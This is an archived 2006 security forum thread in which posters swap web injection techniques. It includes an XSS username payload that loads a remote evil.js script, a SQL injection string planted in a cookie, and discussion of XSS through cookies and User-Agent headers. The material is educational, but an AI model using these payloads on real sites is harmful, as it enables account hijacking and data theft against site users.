Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Injection Techniques
Posted by: digi7al64
Date: September 04, 2006 01:16AM

Ok, we seem to be do a lot of talking about XSS and SQL in the injection arena so i would like to get a thread going on some of the various attack techiques you might have used to break the system. Common or uncommon, i would like to hear about them as well and (if possible) any security measures that might have already been in place.

I'll start.
What - XSS as a username
How - Created an account with the username "Digi7al64<script src=http://www.site.com/evil.js></script>" (remove quotes)
Security - Regexs everywhere. in fact the entire site (sans username was invunerable to injection (xss and sql). Use of quotes (single and double) also filtered to stop sql injection in the username.
About - Choose to use a script src as it allowed me to control what was being run without having to re inject.

What - SQL injection in a cookie "‘ or 1=1--asdfasdfasfasfasdfsdfa"
How - Modified cookie data to include sql injection.
Security - Use of pre built PHP functions to stop injections used everywhere except when comparing cookie values (which were stored as md5 hashes).
About - Coder had expected the string length to be exactly 32 chars long and only checked for that.


Ok, so i know they aren't earth shattering but it something simple to get the thread started.

------------------------

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Injection Techniques
Posted by: rsnake
Date: September 04, 2006 01:41PM

Something I haven't seen much talk about is cookie manipulation to generate XSS. I think the main reason is there hasn't been a viable attack vector until recently (the Flash header spoofing + Expect vulnerability). However, I've found a lot of applications that rely on cookies (and http User_Agent strings to do database lookups or write to logs that are later used by administrators).

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Injection Techniques
Posted by: yawnmoth
Date: September 04, 2006 04:57PM

Except the except vulnerability doesn't use cookies - it just requires the Except header be present, afaik.

Also, scripts that log the user_agent header (or the referer header) and reoutput it in an HTML doc have (often) been vulnerable to XSS long before the possibility of Flash header spoofing was realized.

Ultimately, I don't think manipulating cookies to produce XSS is all that ground-breaking...

Options: ReplyQuote
Re: Injection Techniques
Posted by: rsnake
Date: September 04, 2006 06:21PM

yawnmoth, yes, that's true, but you can use JavaScript to write cookies and those cookies can contain information used in SQL queries (you can get other users of the same system to run your SQL injection for you). ;) You're right, I wouldn't call it ground breaking, but not a lot of people are doing it - in part because of the reasons I mentioned above. I was just making an off hand comment.

I was talking about User_Agent as an aside, not as something requiring Flash header spoofing.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.